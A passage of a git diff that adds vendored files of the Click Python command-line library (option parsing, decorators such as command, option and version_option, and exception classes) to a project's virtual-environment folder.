flag because flag_value was set. + is_flag = True + elif self._flag_needs_value: + # Not a flag, but when used as a flag it shows a prompt. + is_flag = False + else: + # Implicitly a flag because flag options were given. + is_flag = bool(self.secondary_opts) + elif is_flag is False and not self._flag_needs_value: + # Not a flag, and prompt is not enabled, can be used as a + # flag if flag_value is set. + self._flag_needs_value = flag_value is not None + + self.default: t.Union[t.Any, t.Callable[[], t.Any]] + + if is_flag and default_is_missing and not self.required: + if multiple: + self.default = () + else: + self.default = False + + if flag_value is None: + flag_value = not self.default + + self.type: types.ParamType + if is_flag and type is None: + # Re-guess the type from the flag value instead of the + # default. + self.type = types.convert_type(None, flag_value) + + self.is_flag: bool = is_flag + self.is_bool_flag: bool = is_flag and isinstance(self.type, types.BoolParamType) + self.flag_value: t.Any = flag_value + + # Counting + self.count = count + if count: + if type is None: + self.type = types.IntRange(min=0) + if default_is_missing: + self.default = 0 + + self.allow_from_autoenv = allow_from_autoenv + self.help = help + self.show_default = show_default + self.show_choices = show_choices + self.show_envvar = show_envvar + + if __debug__: + if self.nargs == -1: + raise TypeError("nargs=-1 is not supported for options.") + + if self.prompt and self.is_flag and not self.is_bool_flag: + raise TypeError("'prompt' is not valid for non-boolean flag.") + + if not self.is_bool_flag and self.secondary_opts: + raise TypeError("Secondary flag is not valid for non-boolean flag.") + + if self.is_bool_flag and self.hide_input and self.prompt is not None: + raise TypeError( + "'prompt' with 'hide_input' is not valid for boolean flag." 
+ ) + + if self.count: + if self.multiple: + raise TypeError("'count' is not valid with 'multiple'.") + + if self.is_flag: + raise TypeError("'count' is not valid with 'is_flag'.") + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update( + help=self.help, + prompt=self.prompt, + is_flag=self.is_flag, + flag_value=self.flag_value, + count=self.count, + hidden=self.hidden, + ) + return info_dict + + def _parse_decls( + self, decls: t.Sequence[str], expose_value: bool + ) -> t.Tuple[t.Optional[str], t.List[str], t.List[str]]: + opts = [] + secondary_opts = [] + name = None + possible_names = [] + + for decl in decls: + if decl.isidentifier(): + if name is not None: + raise TypeError(f"Name '{name}' defined twice") + name = decl + else: + split_char = ";" if decl[:1] == "/" else "/" + if split_char in decl: + first, second = decl.split(split_char, 1) + first = first.rstrip() + if first: + possible_names.append(split_opt(first)) + opts.append(first) + second = second.lstrip() + if second: + secondary_opts.append(second.lstrip()) + if first == second: + raise ValueError( + f"Boolean option {decl!r} cannot use the" + " same flag for true/false." + ) + else: + possible_names.append(split_opt(decl)) + opts.append(decl) + + if name is None and possible_names: + possible_names.sort(key=lambda x: -len(x[0])) # group long options first + name = possible_names[0][1].replace("-", "_").lower() + if not name.isidentifier(): + name = None + + if name is None: + if not expose_value: + return None, opts, secondary_opts + raise TypeError("Could not determine name for option") + + if not opts and not secondary_opts: + raise TypeError( + f"No options defined but a name was passed ({name})." + " Did you mean to declare an argument instead? Did" + f" you mean to pass '--{name}'?" 
+ ) + + return name, opts, secondary_opts + + def add_to_parser(self, parser: OptionParser, ctx: Context) -> None: + if self.multiple: + action = "append" + elif self.count: + action = "count" + else: + action = "store" + + if self.is_flag: + action = f"{action}_const" + + if self.is_bool_flag and self.secondary_opts: + parser.add_option( + obj=self, opts=self.opts, dest=self.name, action=action, const=True + ) + parser.add_option( + obj=self, + opts=self.secondary_opts, + dest=self.name, + action=action, + const=False, + ) + else: + parser.add_option( + obj=self, + opts=self.opts, + dest=self.name, + action=action, + const=self.flag_value, + ) + else: + parser.add_option( + obj=self, + opts=self.opts, + dest=self.name, + action=action, + nargs=self.nargs, + ) + + def get_help_record(self, ctx: Context) -> t.Optional[t.Tuple[str, str]]: + if self.hidden: + return None + + any_prefix_is_slash = False + + def _write_opts(opts: t.Sequence[str]) -> str: + nonlocal any_prefix_is_slash + + rv, any_slashes = join_options(opts) + + if any_slashes: + any_prefix_is_slash = True + + if not self.is_flag and not self.count: + rv += f" {self.make_metavar()}" + + return rv + + rv = [_write_opts(self.opts)] + + if self.secondary_opts: + rv.append(_write_opts(self.secondary_opts)) + + help = self.help or "" + extra = [] + + if self.show_envvar: + envvar = self.envvar + + if envvar is None: + if ( + self.allow_from_autoenv + and ctx.auto_envvar_prefix is not None + and self.name is not None + ): + envvar = f"{ctx.auto_envvar_prefix}_{self.name.upper()}" + + if envvar is not None: + var_str = ( + envvar + if isinstance(envvar, str) + else ", ".join(str(d) for d in envvar) + ) + extra.append(_("env var: {var}").format(var=var_str)) + + # Temporarily enable resilient parsing to avoid type casting + # failing for the default. Might be possible to extend this to + # help formatting in general. + resilient = ctx.resilient_parsing + ctx.resilient_parsing = True + + try: + default_value = self.get_default(ctx, call=False) + finally: + ctx.resilient_parsing = resilient + + show_default = False + show_default_is_str = False + + if self.show_default is not None: + if isinstance(self.show_default, str): + show_default_is_str = show_default = True + else: + show_default = self.show_default + elif ctx.show_default is not None: + show_default = ctx.show_default + + if show_default_is_str or (show_default and (default_value is not None)): + if show_default_is_str: + default_string = f"({self.show_default})" + elif isinstance(default_value, (list, tuple)): + default_string = ", ".join(str(d) for d in default_value) + elif inspect.isfunction(default_value): + default_string = _("(dynamic)") + elif self.is_bool_flag and self.secondary_opts: + # For boolean flags that have distinct True/False opts, + # use the opt without prefix instead of the value. 
+ default_string = split_opt( + (self.opts if self.default else self.secondary_opts)[0] + )[1] + elif self.is_bool_flag and not self.secondary_opts and not default_value: + default_string = "" + else: + default_string = str(default_value) + + if default_string: + extra.append(_("default: {default}").format(default=default_string)) + + if ( + isinstance(self.type, types._NumberRangeBase) + # skip count with default range type + and not (self.count and self.type.min == 0 and self.type.max is None) + ): + range_str = self.type._describe_range() + + if range_str: + extra.append(range_str) + + if self.required: + extra.append(_("required")) + + if extra: + extra_str = "; ".join(extra) + help = f"{help} [{extra_str}]" if help else f"[{extra_str}]" + + return ("; " if any_prefix_is_slash else " / ").join(rv), help + + @t.overload + def get_default( + self, ctx: Context, call: "te.Literal[True]" = True + ) -> t.Optional[t.Any]: + ... + + @t.overload + def get_default( + self, ctx: Context, call: bool = ... + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + ... + + def get_default( + self, ctx: Context, call: bool = True + ) -> t.Optional[t.Union[t.Any, t.Callable[[], t.Any]]]: + # If we're a non boolean flag our default is more complex because + # we need to look at all flags in the same group to figure out + # if we're the default one in which case we return the flag + # value as default. + if self.is_flag and not self.is_bool_flag: + for param in ctx.command.params: + if param.name == self.name and param.default: + return t.cast(Option, param).flag_value + + return None + + return super().get_default(ctx, call=call) + + def prompt_for_value(self, ctx: Context) -> t.Any: + """This is an alternative flow that can be activated in the full + value processing if a value does not exist. It will prompt the + user until a valid value exists and then returns the processed + value as result. + """ + assert self.prompt is not None + + # Calculate the default before prompting anything to be stable. + default = self.get_default(ctx) + + # If this is a prompt for a flag we need to handle this + # differently. + if self.is_bool_flag: + return confirm(self.prompt, default) + + return prompt( + self.prompt, + default=default, + type=self.type, + hide_input=self.hide_input, + show_choices=self.show_choices, + confirmation_prompt=self.confirmation_prompt, + value_proc=lambda x: self.process_value(ctx, x), + ) + + def resolve_envvar_value(self, ctx: Context) -> t.Optional[str]: + rv = super().resolve_envvar_value(ctx) + + if rv is not None: + return rv + + if ( + self.allow_from_autoenv + and ctx.auto_envvar_prefix is not None + and self.name is not None + ): + envvar = f"{ctx.auto_envvar_prefix}_{self.name.upper()}" + rv = os.environ.get(envvar) + + if rv: + return rv + + return None + + def value_from_envvar(self, ctx: Context) -> t.Optional[t.Any]: + rv: t.Optional[t.Any] = self.resolve_envvar_value(ctx) + + if rv is None: + return None + + value_depth = (self.nargs != 1) + bool(self.multiple) + + if value_depth > 0: + rv = self.type.split_envvar_value(rv) + + if self.multiple and self.nargs != 1: + rv = batch(rv, self.nargs) + + return rv + + def consume_value( + self, ctx: Context, opts: t.Mapping[str, "Parameter"] + ) -> t.Tuple[t.Any, ParameterSource]: + value, source = super().consume_value(ctx, opts) + + # The parser will emit a sentinel value if the option can be + # given as a flag without a value. This is different from None + # to distinguish from the flag not being given at all. 
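The ``_flag_needs_value`` sentinel handled just below corresponds to the ``prompt_required=False`` pattern; a hedged sketch of that behaviour (the ``--username`` option is invented for illustration):

.. code-block:: python

    import click

    @click.command()
    @click.option(
        "--username",
        prompt=True,
        prompt_required=False,  # prompt only when --username is passed without a value
        default="guest",
    )
    def cli(username):
        click.echo(f"user: {username}")

    # cli                -> user: guest   (default used, no prompt)
    # cli --username     -> Username: ... (bare flag triggers the prompt)
    # cli --username bob -> user: bob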
+ if value is _flag_needs_value: + if self.prompt is not None and not ctx.resilient_parsing: + value = self.prompt_for_value(ctx) + source = ParameterSource.PROMPT + else: + value = self.flag_value + source = ParameterSource.COMMANDLINE + + elif ( + self.multiple + and value is not None + and any(v is _flag_needs_value for v in value) + ): + value = [self.flag_value if v is _flag_needs_value else v for v in value] + source = ParameterSource.COMMANDLINE + + # The value wasn't set, or used the param's default, prompt if + # prompting is enabled. + elif ( + source in {None, ParameterSource.DEFAULT} + and self.prompt is not None + and (self.required or self.prompt_required) + and not ctx.resilient_parsing + ): + value = self.prompt_for_value(ctx) + source = ParameterSource.PROMPT + + return value, source + + +class Argument(Parameter): + """Arguments are positional parameters to a command. They generally + provide fewer features than options but can have infinite ``nargs`` + and are required by default. + + All parameters are passed onwards to the constructor of :class:`Parameter`. + """ + + param_type_name = "argument" + + def __init__( + self, + param_decls: t.Sequence[str], + required: t.Optional[bool] = None, + **attrs: t.Any, + ) -> None: + if required is None: + if attrs.get("default") is not None: + required = False + else: + required = attrs.get("nargs", 1) > 0 + + if "multiple" in attrs: + raise TypeError("__init__() got an unexpected keyword argument 'multiple'.") + + super().__init__(param_decls, required=required, **attrs) + + if __debug__: + if self.default is not None and self.nargs == -1: + raise TypeError("'default' is not supported for nargs=-1.") + + @property + def human_readable_name(self) -> str: + if self.metavar is not None: + return self.metavar + return self.name.upper() # type: ignore + + def make_metavar(self) -> str: + if self.metavar is not None: + return self.metavar + var = self.type.get_metavar(self) + if not var: + var = self.name.upper() # type: ignore + if not self.required: + var = f"[{var}]" + if self.nargs != 1: + var += "..." + return var + + def _parse_decls( + self, decls: t.Sequence[str], expose_value: bool + ) -> t.Tuple[t.Optional[str], t.List[str], t.List[str]]: + if not decls: + if not expose_value: + return None, [], [] + raise TypeError("Could not determine name for argument") + if len(decls) == 1: + name = arg = decls[0] + name = name.replace("-", "_").lower() + else: + raise TypeError( + "Arguments take exactly one parameter declaration, got" + f" {len(decls)}." 
+ ) + return name, [arg], [] + + def get_usage_pieces(self, ctx: Context) -> t.List[str]: + return [self.make_metavar()] + + def get_error_hint(self, ctx: Context) -> str: + return f"'{self.make_metavar()}'" + + def add_to_parser(self, parser: OptionParser, ctx: Context) -> None: + parser.add_argument(dest=self.name, nargs=self.nargs, obj=self) diff --git a/env/Lib/site-packages/click/decorators.py b/env/Lib/site-packages/click/decorators.py new file mode 100644 index 00000000..d9bba950 --- /dev/null +++ b/env/Lib/site-packages/click/decorators.py @@ -0,0 +1,561 @@ +import inspect +import types +import typing as t +from functools import update_wrapper +from gettext import gettext as _ + +from .core import Argument +from .core import Command +from .core import Context +from .core import Group +from .core import Option +from .core import Parameter +from .globals import get_current_context +from .utils import echo + +if t.TYPE_CHECKING: + import typing_extensions as te + + P = te.ParamSpec("P") + +R = t.TypeVar("R") +T = t.TypeVar("T") +_AnyCallable = t.Callable[..., t.Any] +FC = t.TypeVar("FC", bound=t.Union[_AnyCallable, Command]) + + +def pass_context(f: "t.Callable[te.Concatenate[Context, P], R]") -> "t.Callable[P, R]": + """Marks a callback as wanting to receive the current context + object as first argument. + """ + + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> "R": + return f(get_current_context(), *args, **kwargs) + + return update_wrapper(new_func, f) + + +def pass_obj(f: "t.Callable[te.Concatenate[t.Any, P], R]") -> "t.Callable[P, R]": + """Similar to :func:`pass_context`, but only pass the object on the + context onwards (:attr:`Context.obj`). This is useful if that object + represents the state of a nested system. + """ + + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> "R": + return f(get_current_context().obj, *args, **kwargs) + + return update_wrapper(new_func, f) + + +def make_pass_decorator( + object_type: t.Type[T], ensure: bool = False +) -> t.Callable[["t.Callable[te.Concatenate[T, P], R]"], "t.Callable[P, R]"]: + """Given an object type this creates a decorator that will work + similar to :func:`pass_obj` but instead of passing the object of the + current context, it will find the innermost context of type + :func:`object_type`. + + This generates a decorator that works roughly like this:: + + from functools import update_wrapper + + def decorator(f): + @pass_context + def new_func(ctx, *args, **kwargs): + obj = ctx.find_object(object_type) + return ctx.invoke(f, obj, *args, **kwargs) + return update_wrapper(new_func, f) + return decorator + + :param object_type: the type of the object to pass. + :param ensure: if set to `True`, a new object will be created and + remembered on the context if it's not there yet. + """ + + def decorator(f: "t.Callable[te.Concatenate[T, P], R]") -> "t.Callable[P, R]": + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> "R": + ctx = get_current_context() + + obj: t.Optional[T] + if ensure: + obj = ctx.ensure_object(object_type) + else: + obj = ctx.find_object(object_type) + + if obj is None: + raise RuntimeError( + "Managed to invoke callback without a context" + f" object of type {object_type.__name__!r}" + " existing." 
+ ) + + return ctx.invoke(f, obj, *args, **kwargs) + + return update_wrapper(new_func, f) + + return decorator # type: ignore[return-value] + + +def pass_meta_key( + key: str, *, doc_description: t.Optional[str] = None +) -> "t.Callable[[t.Callable[te.Concatenate[t.Any, P], R]], t.Callable[P, R]]": + """Create a decorator that passes a key from + :attr:`click.Context.meta` as the first argument to the decorated + function. + + :param key: Key in ``Context.meta`` to pass. + :param doc_description: Description of the object being passed, + inserted into the decorator's docstring. Defaults to "the 'key' + key from Context.meta". + + .. versionadded:: 8.0 + """ + + def decorator(f: "t.Callable[te.Concatenate[t.Any, P], R]") -> "t.Callable[P, R]": + def new_func(*args: "P.args", **kwargs: "P.kwargs") -> R: + ctx = get_current_context() + obj = ctx.meta[key] + return ctx.invoke(f, obj, *args, **kwargs) + + return update_wrapper(new_func, f) + + if doc_description is None: + doc_description = f"the {key!r} key from :attr:`click.Context.meta`" + + decorator.__doc__ = ( + f"Decorator that passes {doc_description} as the first argument" + " to the decorated function." + ) + return decorator # type: ignore[return-value] + + +CmdType = t.TypeVar("CmdType", bound=Command) + + +# variant: no call, directly as decorator for a function. +@t.overload +def command(name: _AnyCallable) -> Command: + ... + + +# variant: with positional name and with positional or keyword cls argument: +# @command(namearg, CommandCls, ...) or @command(namearg, cls=CommandCls, ...) +@t.overload +def command( + name: t.Optional[str], + cls: t.Type[CmdType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], CmdType]: + ... + + +# variant: name omitted, cls _must_ be a keyword argument, @command(cls=CommandCls, ...) +@t.overload +def command( + name: None = None, + *, + cls: t.Type[CmdType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], CmdType]: + ... + + +# variant: with optional string name, no cls argument provided. +@t.overload +def command( + name: t.Optional[str] = ..., cls: None = None, **attrs: t.Any +) -> t.Callable[[_AnyCallable], Command]: + ... + + +def command( + name: t.Union[t.Optional[str], _AnyCallable] = None, + cls: t.Optional[t.Type[CmdType]] = None, + **attrs: t.Any, +) -> t.Union[Command, t.Callable[[_AnyCallable], t.Union[Command, CmdType]]]: + r"""Creates a new :class:`Command` and uses the decorated function as + callback. This will also automatically attach all decorated + :func:`option`\s and :func:`argument`\s as parameters to the command. + + The name of the command defaults to the name of the function with + underscores replaced by dashes. If you want to change that, you can + pass the intended name as the first argument. + + All keyword arguments are forwarded to the underlying command class. + For the ``params`` argument, any decorated params are appended to + the end of the list. + + Once decorated the function turns into a :class:`Command` instance + that can be invoked as a command line utility or be attached to a + command :class:`Group`. + + :param name: the name of the command. This defaults to the function + name with underscores replaced by dashes. + :param cls: the command class to instantiate. This defaults to + :class:`Command`. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + + .. versionchanged:: 8.1 + The ``params`` argument can be used. Decorated params are + appended to the end of the list. 
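As a usage illustration only (not part of the vendored diff): a minimal sketch of how ``make_pass_decorator`` is typically combined with ``ensure=True`` so nested commands share one state object. The ``Config`` class and command names are invented for the example.

.. code-block:: python

    import click


    class Config:
        """Illustrative shared state stored on the context."""

        def __init__(self) -> None:
            self.verbose = False


    # ensure=True creates a Config via ctx.ensure_object() if none exists yet.
    pass_config = click.make_pass_decorator(Config, ensure=True)


    @click.group()
    @click.option("--verbose", is_flag=True)
    @pass_config
    def cli(config: Config, verbose: bool) -> None:
        config.verbose = verbose


    @cli.command()
    @pass_config
    def status(config: Config) -> None:
        click.echo(f"verbose={config.verbose}")


    if __name__ == "__main__":
        cli()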
+ """ + + func: t.Optional[t.Callable[[_AnyCallable], t.Any]] = None + + if callable(name): + func = name + name = None + assert cls is None, "Use 'command(cls=cls)(callable)' to specify a class." + assert not attrs, "Use 'command(**kwargs)(callable)' to provide arguments." + + if cls is None: + cls = t.cast(t.Type[CmdType], Command) + + def decorator(f: _AnyCallable) -> CmdType: + if isinstance(f, Command): + raise TypeError("Attempted to convert a callback into a command twice.") + + attr_params = attrs.pop("params", None) + params = attr_params if attr_params is not None else [] + + try: + decorator_params = f.__click_params__ # type: ignore + except AttributeError: + pass + else: + del f.__click_params__ # type: ignore + params.extend(reversed(decorator_params)) + + if attrs.get("help") is None: + attrs["help"] = f.__doc__ + + if t.TYPE_CHECKING: + assert cls is not None + assert not callable(name) + + cmd = cls( + name=name or f.__name__.lower().replace("_", "-"), + callback=f, + params=params, + **attrs, + ) + cmd.__doc__ = f.__doc__ + return cmd + + if func is not None: + return decorator(func) + + return decorator + + +GrpType = t.TypeVar("GrpType", bound=Group) + + +# variant: no call, directly as decorator for a function. +@t.overload +def group(name: _AnyCallable) -> Group: + ... + + +# variant: with positional name and with positional or keyword cls argument: +# @group(namearg, GroupCls, ...) or @group(namearg, cls=GroupCls, ...) +@t.overload +def group( + name: t.Optional[str], + cls: t.Type[GrpType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], GrpType]: + ... + + +# variant: name omitted, cls _must_ be a keyword argument, @group(cmd=GroupCls, ...) +@t.overload +def group( + name: None = None, + *, + cls: t.Type[GrpType], + **attrs: t.Any, +) -> t.Callable[[_AnyCallable], GrpType]: + ... + + +# variant: with optional string name, no cls argument provided. +@t.overload +def group( + name: t.Optional[str] = ..., cls: None = None, **attrs: t.Any +) -> t.Callable[[_AnyCallable], Group]: + ... + + +def group( + name: t.Union[str, _AnyCallable, None] = None, + cls: t.Optional[t.Type[GrpType]] = None, + **attrs: t.Any, +) -> t.Union[Group, t.Callable[[_AnyCallable], t.Union[Group, GrpType]]]: + """Creates a new :class:`Group` with a function as callback. This + works otherwise the same as :func:`command` just that the `cls` + parameter is set to :class:`Group`. + + .. versionchanged:: 8.1 + This decorator can be applied without parentheses. + """ + if cls is None: + cls = t.cast(t.Type[GrpType], Group) + + if callable(name): + return command(cls=cls, **attrs)(name) + + return command(name, cls, **attrs) + + +def _param_memo(f: t.Callable[..., t.Any], param: Parameter) -> None: + if isinstance(f, Command): + f.params.append(param) + else: + if not hasattr(f, "__click_params__"): + f.__click_params__ = [] # type: ignore + + f.__click_params__.append(param) # type: ignore + + +def argument( + *param_decls: str, cls: t.Optional[t.Type[Argument]] = None, **attrs: t.Any +) -> t.Callable[[FC], FC]: + """Attaches an argument to the command. All positional arguments are + passed as parameter declarations to :class:`Argument`; all keyword + arguments are forwarded unchanged (except ``cls``). + This is equivalent to creating an :class:`Argument` instance manually + and attaching it to the :attr:`Command.params` list. + + For the default argument class, refer to :class:`Argument` and + :class:`Parameter` for descriptions of parameters. + + :param cls: the argument class to instantiate. 
This defaults to + :class:`Argument`. + :param param_decls: Passed as positional arguments to the constructor of + ``cls``. + :param attrs: Passed as keyword arguments to the constructor of ``cls``. + """ + if cls is None: + cls = Argument + + def decorator(f: FC) -> FC: + _param_memo(f, cls(param_decls, **attrs)) + return f + + return decorator + + +def option( + *param_decls: str, cls: t.Optional[t.Type[Option]] = None, **attrs: t.Any +) -> t.Callable[[FC], FC]: + """Attaches an option to the command. All positional arguments are + passed as parameter declarations to :class:`Option`; all keyword + arguments are forwarded unchanged (except ``cls``). + This is equivalent to creating an :class:`Option` instance manually + and attaching it to the :attr:`Command.params` list. + + For the default option class, refer to :class:`Option` and + :class:`Parameter` for descriptions of parameters. + + :param cls: the option class to instantiate. This defaults to + :class:`Option`. + :param param_decls: Passed as positional arguments to the constructor of + ``cls``. + :param attrs: Passed as keyword arguments to the constructor of ``cls``. + """ + if cls is None: + cls = Option + + def decorator(f: FC) -> FC: + _param_memo(f, cls(param_decls, **attrs)) + return f + + return decorator + + +def confirmation_option(*param_decls: str, **kwargs: t.Any) -> t.Callable[[FC], FC]: + """Add a ``--yes`` option which shows a prompt before continuing if + not passed. If the prompt is declined, the program will exit. + + :param param_decls: One or more option names. Defaults to the single + value ``"--yes"``. + :param kwargs: Extra arguments are passed to :func:`option`. + """ + + def callback(ctx: Context, param: Parameter, value: bool) -> None: + if not value: + ctx.abort() + + if not param_decls: + param_decls = ("--yes",) + + kwargs.setdefault("is_flag", True) + kwargs.setdefault("callback", callback) + kwargs.setdefault("expose_value", False) + kwargs.setdefault("prompt", "Do you want to continue?") + kwargs.setdefault("help", "Confirm the action without prompting.") + return option(*param_decls, **kwargs) + + +def password_option(*param_decls: str, **kwargs: t.Any) -> t.Callable[[FC], FC]: + """Add a ``--password`` option which prompts for a password, hiding + input and asking to enter the value again for confirmation. + + :param param_decls: One or more option names. Defaults to the single + value ``"--password"``. + :param kwargs: Extra arguments are passed to :func:`option`. + """ + if not param_decls: + param_decls = ("--password",) + + kwargs.setdefault("prompt", True) + kwargs.setdefault("confirmation_prompt", True) + kwargs.setdefault("hide_input", True) + return option(*param_decls, **kwargs) + + +def version_option( + version: t.Optional[str] = None, + *param_decls: str, + package_name: t.Optional[str] = None, + prog_name: t.Optional[str] = None, + message: t.Optional[str] = None, + **kwargs: t.Any, +) -> t.Callable[[FC], FC]: + """Add a ``--version`` option which immediately prints the version + number and exits the program. + + If ``version`` is not provided, Click will try to detect it using + :func:`importlib.metadata.version` to get the version for the + ``package_name``. On Python < 3.8, the ``importlib_metadata`` + backport must be installed. + + If ``package_name`` is not provided, Click will try to detect it by + inspecting the stack frames. This will be used to detect the + version, so it must match the name of the installed package. + + :param version: The version number to show. 
If not provided, Click + will try to detect it. + :param param_decls: One or more option names. Defaults to the single + value ``"--version"``. + :param package_name: The package name to detect the version from. If + not provided, Click will try to detect it. + :param prog_name: The name of the CLI to show in the message. If not + provided, it will be detected from the command. + :param message: The message to show. The values ``%(prog)s``, + ``%(package)s``, and ``%(version)s`` are available. Defaults to + ``"%(prog)s, version %(version)s"``. + :param kwargs: Extra arguments are passed to :func:`option`. + :raise RuntimeError: ``version`` could not be detected. + + .. versionchanged:: 8.0 + Add the ``package_name`` parameter, and the ``%(package)s`` + value for messages. + + .. versionchanged:: 8.0 + Use :mod:`importlib.metadata` instead of ``pkg_resources``. The + version is detected based on the package name, not the entry + point name. The Python package name must match the installed + package name, or be passed with ``package_name=``. + """ + if message is None: + message = _("%(prog)s, version %(version)s") + + if version is None and package_name is None: + frame = inspect.currentframe() + f_back = frame.f_back if frame is not None else None + f_globals = f_back.f_globals if f_back is not None else None + # break reference cycle + # https://docs.python.org/3/library/inspect.html#the-interpreter-stack + del frame + + if f_globals is not None: + package_name = f_globals.get("__name__") + + if package_name == "__main__": + package_name = f_globals.get("__package__") + + if package_name: + package_name = package_name.partition(".")[0] + + def callback(ctx: Context, param: Parameter, value: bool) -> None: + if not value or ctx.resilient_parsing: + return + + nonlocal prog_name + nonlocal version + + if prog_name is None: + prog_name = ctx.find_root().info_name + + if version is None and package_name is not None: + metadata: t.Optional[types.ModuleType] + + try: + from importlib import metadata # type: ignore + except ImportError: + # Python < 3.8 + import importlib_metadata as metadata # type: ignore + + try: + version = metadata.version(package_name) # type: ignore + except metadata.PackageNotFoundError: # type: ignore + raise RuntimeError( + f"{package_name!r} is not installed. Try passing" + " 'package_name' instead." + ) from None + + if version is None: + raise RuntimeError( + f"Could not determine the version for {package_name!r} automatically." + ) + + echo( + message % {"prog": prog_name, "package": package_name, "version": version}, + color=ctx.color, + ) + ctx.exit() + + if not param_decls: + param_decls = ("--version",) + + kwargs.setdefault("is_flag", True) + kwargs.setdefault("expose_value", False) + kwargs.setdefault("is_eager", True) + kwargs.setdefault("help", _("Show the version and exit.")) + kwargs["callback"] = callback + return option(*param_decls, **kwargs) + + +def help_option(*param_decls: str, **kwargs: t.Any) -> t.Callable[[FC], FC]: + """Add a ``--help`` option which immediately prints the help page + and exits the program. + + This is usually unnecessary, as the ``--help`` option is added to + each command automatically unless ``add_help_option=False`` is + passed. + + :param param_decls: One or more option names. Defaults to the single + value ``"--help"``. + :param kwargs: Extra arguments are passed to :func:`option`. 
+ """ + + def callback(ctx: Context, param: Parameter, value: bool) -> None: + if not value or ctx.resilient_parsing: + return + + echo(ctx.get_help(), color=ctx.color) + ctx.exit() + + if not param_decls: + param_decls = ("--help",) + + kwargs.setdefault("is_flag", True) + kwargs.setdefault("expose_value", False) + kwargs.setdefault("is_eager", True) + kwargs.setdefault("help", _("Show this message and exit.")) + kwargs["callback"] = callback + return option(*param_decls, **kwargs) diff --git a/env/Lib/site-packages/click/exceptions.py b/env/Lib/site-packages/click/exceptions.py new file mode 100644 index 00000000..fe68a361 --- /dev/null +++ b/env/Lib/site-packages/click/exceptions.py @@ -0,0 +1,288 @@ +import typing as t +from gettext import gettext as _ +from gettext import ngettext + +from ._compat import get_text_stderr +from .utils import echo +from .utils import format_filename + +if t.TYPE_CHECKING: + from .core import Command + from .core import Context + from .core import Parameter + + +def _join_param_hints( + param_hint: t.Optional[t.Union[t.Sequence[str], str]] +) -> t.Optional[str]: + if param_hint is not None and not isinstance(param_hint, str): + return " / ".join(repr(x) for x in param_hint) + + return param_hint + + +class ClickException(Exception): + """An exception that Click can handle and show to the user.""" + + #: The exit code for this exception. + exit_code = 1 + + def __init__(self, message: str) -> None: + super().__init__(message) + self.message = message + + def format_message(self) -> str: + return self.message + + def __str__(self) -> str: + return self.message + + def show(self, file: t.Optional[t.IO[t.Any]] = None) -> None: + if file is None: + file = get_text_stderr() + + echo(_("Error: {message}").format(message=self.format_message()), file=file) + + +class UsageError(ClickException): + """An internal exception that signals a usage error. This typically + aborts any further handling. + + :param message: the error message to display. + :param ctx: optionally the context that caused this error. Click will + fill in the context automatically in some situations. + """ + + exit_code = 2 + + def __init__(self, message: str, ctx: t.Optional["Context"] = None) -> None: + super().__init__(message) + self.ctx = ctx + self.cmd: t.Optional["Command"] = self.ctx.command if self.ctx else None + + def show(self, file: t.Optional[t.IO[t.Any]] = None) -> None: + if file is None: + file = get_text_stderr() + color = None + hint = "" + if ( + self.ctx is not None + and self.ctx.command.get_help_option(self.ctx) is not None + ): + hint = _("Try '{command} {option}' for help.").format( + command=self.ctx.command_path, option=self.ctx.help_option_names[0] + ) + hint = f"{hint}\n" + if self.ctx is not None: + color = self.ctx.color + echo(f"{self.ctx.get_usage()}\n{hint}", file=file, color=color) + echo( + _("Error: {message}").format(message=self.format_message()), + file=file, + color=color, + ) + + +class BadParameter(UsageError): + """An exception that formats out a standardized error message for a + bad parameter. This is useful when thrown from a callback or type as + Click will attach contextual information to it (for instance, which + parameter it is). + + .. versionadded:: 2.0 + + :param param: the parameter object that caused this error. This can + be left out, and Click will attach this info itself + if possible. + :param param_hint: a string that shows up as parameter name. 
This + can be used as alternative to `param` in cases + where custom validation should happen. If it is + a string it's used as such, if it's a list then + each item is quoted and separated. + """ + + def __init__( + self, + message: str, + ctx: t.Optional["Context"] = None, + param: t.Optional["Parameter"] = None, + param_hint: t.Optional[str] = None, + ) -> None: + super().__init__(message, ctx) + self.param = param + self.param_hint = param_hint + + def format_message(self) -> str: + if self.param_hint is not None: + param_hint = self.param_hint + elif self.param is not None: + param_hint = self.param.get_error_hint(self.ctx) # type: ignore + else: + return _("Invalid value: {message}").format(message=self.message) + + return _("Invalid value for {param_hint}: {message}").format( + param_hint=_join_param_hints(param_hint), message=self.message + ) + + +class MissingParameter(BadParameter): + """Raised if click required an option or argument but it was not + provided when invoking the script. + + .. versionadded:: 4.0 + + :param param_type: a string that indicates the type of the parameter. + The default is to inherit the parameter type from + the given `param`. Valid values are ``'parameter'``, + ``'option'`` or ``'argument'``. + """ + + def __init__( + self, + message: t.Optional[str] = None, + ctx: t.Optional["Context"] = None, + param: t.Optional["Parameter"] = None, + param_hint: t.Optional[str] = None, + param_type: t.Optional[str] = None, + ) -> None: + super().__init__(message or "", ctx, param, param_hint) + self.param_type = param_type + + def format_message(self) -> str: + if self.param_hint is not None: + param_hint: t.Optional[str] = self.param_hint + elif self.param is not None: + param_hint = self.param.get_error_hint(self.ctx) # type: ignore + else: + param_hint = None + + param_hint = _join_param_hints(param_hint) + param_hint = f" {param_hint}" if param_hint else "" + + param_type = self.param_type + if param_type is None and self.param is not None: + param_type = self.param.param_type_name + + msg = self.message + if self.param is not None: + msg_extra = self.param.type.get_missing_message(self.param) + if msg_extra: + if msg: + msg += f". {msg_extra}" + else: + msg = msg_extra + + msg = f" {msg}" if msg else "" + + # Translate param_type for known types. + if param_type == "argument": + missing = _("Missing argument") + elif param_type == "option": + missing = _("Missing option") + elif param_type == "parameter": + missing = _("Missing parameter") + else: + missing = _("Missing {param_type}").format(param_type=param_type) + + return f"{missing}{param_hint}.{msg}" + + def __str__(self) -> str: + if not self.message: + param_name = self.param.name if self.param else None + return _("Missing parameter: {param_name}").format(param_name=param_name) + else: + return self.message + + +class NoSuchOption(UsageError): + """Raised if click attempted to handle an option that does not + exist. + + .. 
